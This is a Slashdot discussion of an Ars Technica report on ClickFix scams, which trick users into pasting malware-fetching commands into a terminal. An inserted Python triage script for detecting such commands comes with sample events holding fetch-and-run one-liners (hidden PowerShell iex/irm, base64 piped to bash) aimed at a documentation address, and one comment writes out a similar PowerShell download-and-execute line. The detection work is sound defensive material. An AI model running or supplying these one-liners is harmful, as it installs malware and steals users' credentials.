ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of (arstechnica.com)

An anonymous reader quotes a report from Ars Technica: ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.
Researchers from CrowdStrike described in a report a campaign designed to infect Macs with a Mach-O executable. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."

Push Security, meanwhile, reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.
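The summary describes the shape of the pasted command (a hidden, no-profile PowerShell or a one-line macOS installer that fetches a payload and runs it, often base64-encoded) but not how a defender would pick it out of process-creation telemetry. What follows is an added example for this thread, not code from Ars Technica, CrowdStrike, Push Security or any endpoint product: a small Python triage that decodes base64 blobs (PowerShell's UTF-16LE -EncodedCommand and `echo ... | base64 -d` pipelines), masks them so raw base64 cannot spoof a keyword, and weights the combination of download cradle, iex or pipe-to-shell, and hidden-window flags together with an interactive parent process (explorer.exe for Win+R, a terminal on macOS). The event field names, the parent-process heuristic, the weights, the threshold of 6 and the sample events (203.0.113.10 is a documentation address standing in for the scammer's server) are all assumptions constructed for illustration; the example deliberately covers both the Windows irm|iex shape and the macOS base64-to-bash variant.

```python
"""Triage process-creation events for ClickFix-style paste-and-run one-liners.

Added example for this thread, not code from Ars Technica, CrowdStrike, Push
Security or any product. Event fields, the parent-process heuristic, indicator
weights and the threshold are assumptions; the sample events are constructed.
"""
import base64
import binascii
import re

# Weighted regexes for the shape described in the summary: a hidden, no-profile
# PowerShell that fetches a script and hands it to iex, or a base64 blob decoded
# straight into a shell. Each alone is common in admin work; the combination matters.
INDICATORS = [
    ("hidden_window", r"(?i)-w(?:indowstyle)?\s+hidden", 2),
    ("no_profile", r"(?i)-nop(?:rofile)?\b", 1),
    ("bypass_policy", r"(?i)-e(?:xecution)?p(?:olicy)?\s+bypass", 2),
    ("download_cradle", r"(?i)\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|curl|wget)\b", 2),
    ("invoke_expression", r"(?i)\b(?:iex|Invoke-Expression)\b", 3),
    ("pipe_to_shell", r"(?i)\|\s*(?:ba|z)?sh\b", 3),
    ("inline_base64_decode", r"(?i)\bbase64\s+(?:-d|--decode)\b|FromBase64String", 2),
    ("quarantine_strip", r"(?i)\bxattr\b.*com\.apple\.quarantine", 3),
]
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Parents of processes a person drives by hand (assumption: Win+R spawns from
# explorer.exe; a terminal or shell on macOS). ClickFix is pasted by a human, so an
# interactive parent is part of the pattern; a service running a cradle is a different case.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe", "terminal", "iterm2", "zsh", "bash"}


def _is_text(s):
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def decode_blobs(cmdline):
    """Return the plaintext of every base64 token in cmdline that decodes to text.

    PowerShell's -EncodedCommand (-e/-ec/-enc) carries UTF-16LE; an
    `echo <b64> | base64 -d` pipeline is normally UTF-8. Try the encoding the
    context suggests first and keep whichever yields printable text.
    """
    found = []
    for m in B64_TOKEN_RE.finditer(cmdline):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        prefix = cmdline[max(0, m.start() - 20):m.start()]
        ps_enc = re.search(r"(?i)-e(?:c|nc|ncodedcommand)?\s*$", prefix) is not None
        for enc in (("utf-16-le", "utf-8") if ps_enc else ("utf-8", "utf-16-le")):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if _is_text(text):
                found.append(text)
                break
    return found


def score_command(cmdline):
    """Weight the indicators found in cmdline and in any base64 payload it carries."""
    hits = {}
    decoded = decode_blobs(cmdline)
    if decoded:
        hits["base64_payload"] = 2
    # Scan the raw line with blobs masked (a base64 run cannot then fake a keyword)
    # together with the decoded payloads.
    text = "\n".join([B64_TOKEN_RE.sub("<b64>", cmdline)] + decoded)
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, text):
            hits[name] = weight
    return sum(hits.values()), hits


def triage(events, threshold=6):
    """Return an alert for every event whose weighted indicators reach the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_command(ev["cmdline"])
        if ev.get("parent", "").lower() in INTERACTIVE_PARENTS:
            hits["interactive_parent"] = 2
            score += 2
        if score >= threshold:
            alerts.append({"host": ev["host"], "score": score, "hits": sorted(hits), "cmdline": ev["cmdline"]})
    return alerts


# Constructed sample events in a Sysmon/4688-like shape (not real telemetry).
_PS_ENC = base64.b64encode("iex (iwr 'http://203.0.113.10/v').Content".encode("utf-16-le")).decode()
_MAC_B64 = base64.b64encode(b"curl -fsSL http://203.0.113.10/m | bash").decode()
SAMPLE_EVENTS = [
    {"host": "pc1", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iex (irm http://203.0.113.10/check)"'},
    {"host": "pc2", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc " + _PS_ENC},
    {"host": "mac1", "parent": "Terminal", "image": "zsh",
     "cmdline": '/bin/zsh -c "echo ' + _MAC_B64 + ' | base64 -d | bash"'},
    {"host": "pc3", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\Tools\inventory.ps1"},
    {"host": "srv1", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": r'powershell -NoProfile -Command "Invoke-WebRequest -Uri https://updates.example.internal/agent.msi -OutFile C:\Temp\agent.msi"'},
    {"host": "mac2", "parent": "Terminal", "image": "zsh",
     "cmdline": "git clone https://github.com/example/repo.git"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["host"], alert["score"], ", ".join(alert["hits"]))
        print("   ", alert["cmdline"][:90])
```

Run as a script it prints three alerts (pc1, pc2, mac1); the two benign PowerShell lines (a local -File run and a service fetching an MSI) each score 3 and stay under the threshold, which is the reason for scoring the combination rather than any single keyword. The masking step matters: the `\b` word boundaries in the keyword regexes would otherwise fire on whatever happens to appear inside a long base64 run.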

  • by Smonster ( 2884001 ) on Tuesday November 11, 2025 @08:05PM (#65789028)
    Clearly.

    Fortunately there is an easy fix. Education. Never click on links from any email you receive unless you just initiated the link being sent to you. Go to the businesses actual website, log in from there. If it’s legit you’ll very likely see what it was talking about upon login or after a brief search through the sites menus.

    Unfortunately for many people, they are too lazy, ignorant, and/or refuse to take basic and easy precautions. And yes, some people are just dumb on their best days. That’s why things like this work if you send such scams to enough people.
    • Yes, but half the people have below-average intelligence.

      We won't have a stable society if they're constantly scammed.

      And I know some High-IQ people with no street smarts who got scammed by "Raj from Microsoft Support".

      Really some dude from a trailer park might have a better BS detector, having lived a less coddled existence.

      • by Wokan ( 14062 )

        Yes, but half the people have below-average intelligence.

        Finally. My chance to be modded as pedantic...

        Half the people have a below-MEDIAN intelligence.

        (Sorry, all. Couldn't resist.)

      • This is something I see a lot. When people say, "caveat emptor", or "you have to be smarter next time" when a scammer is successful, it doesn't do any good. We do need some scammer protection to maintain a high-trust society. Otherwise, one can't really do much business, when most of life is spent trying to check if every part of a business transaction is legit, or something contrived.

        Part of it is that some devices are deliberately wide open for advertising dollars. However, if someone can advertise, t

    • Never click on links from any email you receive unless you just initiated the link being sent to you.

      Certainly don't ever, "copy a string of text, open a terminal window, paste it in, and press Enter".
      Seriously, why would any legitimate site ask you to do that. [*smacks forehead*]

      • "Then, the machine automatically installs it -- all with no indication to the target."

        Your point: the indication to the target was when they pasted something they didn't understand.

      • Well, the thing also masquerades itself as a tutorial to solve problems that people may have, as a sponsored Google result. And solving IT problems often involves typing arcade commands in a terminal window.
        • as a sponsored Google result

          This is the problem right here. Why is Google not considered an accessory? Google received consideration to disseminate it and they either employed no or insufficient oversight. This is not simply user-provided content which was posted without their cooperation.

          • Yeah, their lax attitude towards keeping malicious sites out of their ad list should carry liability. They took money to direct unsuspecting users to scams. Why wouldn't they be liable?
        • by srg33 ( 1095679 )

          Typos are funny: "typing arcade commands in a terminal window." I believe that you meant "arcane commands". But, many users treat everything like a video game ...

      • by ccr ( 168366 )

        Indeed .. https://rust-lang.org/tools/in... [rust-lang.org] .. and many others that just instruct you to "curl | sh".

      • I'm wondering what the overlap is in the Venn diagram of people smart enough to open the terminal window yet dumb enough to paste random things into it?
        • by aitikin ( 909209 )

          I'm wondering what the overlap is in the Venn diagram of people smart enough to open the terminal window yet dumb enough to paste random things into it?

          Pretty sure it's a lot when the sites are explaining how to open the terminal from the run command or Spotlight commands. I highly doubt that these bad actors are expecting the user to know how themselves and would expect they're giving them explicit instructions.

      • by pooh666 ( 624584 )
        Yeah, wow that is a scary smart exploit there! Exactly what I was going to say.
    • by Bert64 ( 520050 )

      The problem here is that many legitimate companies do in fact send unexpected emails containing links, or make unexpected calls without proving their identity (and even asking you to).
      All of this trains users to expect such actions, and makes them more susceptible to the scams.

      If you do practice basic precautions and question these companies for their poor practices they will often push back and call you paranoid.

    • by Jeremi ( 14640 )

      Fortunately there is an easy fix. Education.

      If education were an easy fix, we'd have an educated populace and ClickFix wouldn't be a problem.

      The fact is, we live in eternal September. No matter how many people we educate, there's an unending firehose of exploitable n00bs arriving to replace them.

    • Fortunately there is an easy fix. Education.

      If user education was going to work, it would have worked by now.

      That's a quote from an A/V conference about 20 years ago. Even then it was obvious that it wasn't working.

    • by quenda ( 644621 )

      Never click on links from any email you receive unless you just initiated the link being sent to you.

      Why not? I'm curious. I'm not doing it from my work PC inside a secure facility. Should I be worried about a 0-day in Chrome?

      OTOH, there is no way in hell I will paste a random string of text into a shell. Then again ... I've probably run a few 1-liner curl scripts to install software I just heard about :-(

    • Laziness is why I'm surprised this works at all. Open a command prompt, no, an admin prompt -> UAC -> copy -> paste -> another warning -> enter. How many victims get halfway through that before giving up?
  • WTF? (Score:5, Insightful)

    by Randseed ( 132501 ) on Tuesday November 11, 2025 @08:05PM (#65789030)

    Why the hell would someone go open a terminal window and paste random shit in from a web page?

    • Because you can't fix stupid?
    • Re:WTF? (Score:5, Funny)

      by taustin ( 171655 ) on Tuesday November 11, 2025 @08:26PM (#65789090) Homepage Journal

      "When you're dead, you do not know that you are dead. The pain is felt by others. The same thing happens when you're stupid"

    • by Jjeff1 ( 636051 )
      Because they don't know any better. Some official looking web site says to press some buttons and do some thing, they do it. No different than amazon prompting them to type in their credit card number to buy steak knives. Even among knowledgeable people... There is an RMM I use, if you hit F12 in the browser, the hidden browser console has bright red bold font telling you not to paste anything into the console. And it's an RMM tool for IT people.
    • Average person wouldn't even know what the terminal is, much less how to go about running terminal commands. And anyone that knows what the terminal is, should be smart enough to know not to run terminal commands from any website, even ones you trust.

      • by Bert64 ( 520050 )

        No they don't know what it is, so when given instructions explaining how to invoke it they don't question them.

    • Probably because they see idiots typing in "do as I say" [reddit.com] without reading the prompt and then bitch about the broken system after the fact as if it's normal.

      Heads up people: If you see a black box with a blinking text cursor and no fancy Word functions, that's an expert-only area and you should leave it the fuck alone!
      • Hey, this is your son who needs bail money. Send *whatever* in *Apple cards* to *wherever*.

        It works. Credulous can't be fixed.

    • The second link is more interesting (and shows how users can be manipulated into doing that):

      In an exemplar campaign from June 2025, when the victim searches for a macOS-related issue — for example, “macos flush resolver cache” — they receive a promoted malvertising website in their search results (Figure 1). Users located in multiple countries — including the U.S., UK, Japan, China, Colombia, Canada, Mexico, Italy, and others — received these advertisements; no victims
    • by tlhIngan ( 30335 )

      Why the hell would someone go open a terminal window and paste random shit in from a web page?

      Because it leads them to what they want?

      You can advertise "free pr0n!" and have people copy and paste random text into a terminal window if they believe it'll get them to what they want. Your random script can even pop open a website to make it look legit.

      It's the whole Dancing Pigs [wikipedia.org] means of security. If you offer a user a video of dancing pigs, they'll do anything to see it.

    • Many don't even know what a terminal is. We are now trained through 2-factor authorization techniques that it is OK to have to prove yourself through a second method outside the browser page. It's not a far leap from email or text messages to entering a code into an app window.
      • by tlhIngan ( 30335 )

        Many don't even know what a terminal is. We are now trained through 2-factor authorization techniques that it is OK to have to prove yourself through a second method outside the browser page. It's not a far leap from email or text messages to entering a code into an app window.

        It doesn't matter. You can walk someone through installing the Terminal app on Windows if they're motivated enough for the outcome.

        People search all the time for free stuff - perhaps you can set up a page to "get Photoshop for free!"

    • Why the hell would someone go open a terminal window and paste random shit in from a web page?

      https://docs.chef.io/chef_inst... [docs.chef.io]
      https://github.com/puppetlabs/... [github.com]
      https://github.com/saltstack/s... [github.com]
      https://docs.brew.sh/Installat... [docs.brew.sh]

      This is accepted practice in the devops world unfortunately. It always sets off my spider senses when I see it, but with an authoritative enough looking source and informed timing as the article suggests, you could dupe a bunch of "modern" developers. For non-technical people, forget about it, why would most people doubt sketchy hotel WiFi setup instructions given the mess the

  • Today, we are gonna learn how to bypass all security safeties with simple hand tools. We will need a breaker bar, a torque wrench and our safety glasses

  • PowerShell defaults (Score:5, Informative)

    by omnichad ( 1198475 ) on Tuesday November 11, 2025 @08:44PM (#65789108) Homepage

    PowerShell defaults are partly to blame on the Windows side. You can't double click a .ps1 file without editing security settings. But you can pipe an irm command into iex and run a random script from the web with no checks at all. Just a one-liner copied and pasted and you've handed over complete control.

    • OK I see the problem. We need to take away the ability to paste from end users. /s
      • Actually, that's probably the right idea. Not blocking paste, of course. But as it is, a file downloaded from the Internet has attributes to mark it as potentially unsafe. The clipboard could probably handle such an attribute. And when pasting into sensitive areas, that flag could prompt a warning confirmation. Only a minor UAC type annoyance to the end user but at the very least a chance to validate. And if the user has an antivirus, scanning that string and the domain names in any URLs when pasting

      • by allo ( 1728082 )

        Look what the Firefox Developer console tells you when you try to paste in there for the first time:

        Scam Warning: Take care when pasting things you don’t understand. This could allow attackers to steal your identity or take control of your computer. Please type ‘allow pasting’ below (no need to press enter) to allow pasting.

      • by Megane ( 129182 )
        Perl had the concept of "tainted" input data to make it sort of possible to prevent SQL/shell injection, etc. We've already got web browsers marking downloaded files as "treat this like a biohazard" even if it's just a stupid text file, why not clipboard contents too? (...to be followed by the scam instructions telling you to open a text editor, create a new document, paste into it, copy what you just pasted... the universe can always create Bigger Idiots)
    • by Bert64 ( 520050 )

      Same on macos and linux, it's not a windows specific fault.
      In fact there is a lot of legitimate software which provides "paste this into terminal" instructions, for instance homebrew on macos (https://brew.sh). This then goes and retrieves a shellscript and executes it with no validation.

      This is a general purpose computer fault. The fact is general purpose computers are not a suitable tool for the masses, they are highly complex tools only suitable for those who know how to use them safely. Most people woul

      • Same on macos and linux, it's not a windows specific fault. In fact there is a lot of legitimate software which provides "paste this into terminal" instructions, for instance homebrew on macos (https://brew.sh). This then goes and retrieves a shellscript and executes it with no validation.

        This is a general purpose computer fault. The fact is general purpose computers are not a suitable tool for the masses, they are highly complex tools only suitable for those who know how to use them safely. Most people would be much better off with an appliance.

        I remember a time, not so long ago now, when folks started talking about licensing actual PCs, and everybody else could have tablets and chromebooks. It may seem harsh, but if security matters it may be time to discuss this again. It wouldn't even have to be a difficult bar to cross for security. "You receive an email with a link in it from someone you don't know. What do you do?"
        "You see a pop-up ad telling you your system is infected and to click this link to clean it. What do you do?"

        A series of five or

  • Man, at this point I am thinking I should just disable all links in any email I get.

  • The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

    I mean . . come on

  • How is it possible that the file downloads itself and executes itself without me interacting with it in macOS? If it's a payload it has to be an .app or .dmg file, because a .sh file needs its permissions changed to be executable from the GUI; otherwise it is treated like a regular file.
    • by apparently ( 756613 ) on Tuesday November 11, 2025 @10:12PM (#65789252)
      If my understanding of this part of the summary is correct:

      "The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. "

      what happens is, the user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

    • by Bert64 ( 520050 )

      Go to https://brew.sh/ [brew.sh] - this is legitimate software for macos and the installation instructions are basically "paste this into a terminal".
      It downloads a shellscript from github, and executes it.
      There are quite a few legitimate programs like this, which trains users that this is normal.

      • Not sure I would classify that kind of negligence as legitimate. But yeah, most git repos have lines to clone them as text to be copied and pasted into a shell.

  • "The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter"

    Seriously??
  • Ah yes, reminds me of the bad old days of the first PDP-8 virus:

    "Your bank account has been compromised. To restore security, toggle in the following sequence on your PDP-8 front panel: 110101-010010 111110-000000 ..."

  • Copying something in a command prompt involves quite a bit of interaction. The text reads: "First, I contacted my bank, then I had them pay out all my money, then I put the wood and money into the fireplace, then I lit it up, and finally, I watched my money burn to ash without any interaction on my part!"

  • So, Meta-using idiots are getting scammed. I'm not even getting some popcorn.
    https://www.reuters.com/invest... [reuters.com]
  • Try and talk someone through using Ping to diagnose a problem they are having? "OMG!!! A terminal window??? No way! What even is that? Text? Prompt? Are you speaking Klingon? Jesus!"

    Scammer tells them to copy and paste some text into a command line window "Yep! No problem! Done it!"

  • $powershell -w hidden -nop -c "$x = [System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI 'http://maliciüs-site.cöm/malware').Content); iex $x"
  • Only an utter idiot will paste and execute in a terminal window a command provided by someone unknown over the Internet.

    • by vbdasc ( 146051 )

      I only hope that the good people at Microsoft, in their infinite wisdom and eternal quest for security, don't decide to make invoking the command prompt harder, or, G-d forbid, disable it altogether. It would truly be a catastrophe.

  • by mspohr ( 589790 ) on Wednesday November 12, 2025 @12:01PM (#65790320)

    A person has to be pretty stupid to blindly follow all these steps.

  • >The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

    If you are willing to do this, maybe you shouldn't own a computer. Just like a driver's license, maybe we should have some basic knowledge test to drive on the internet.
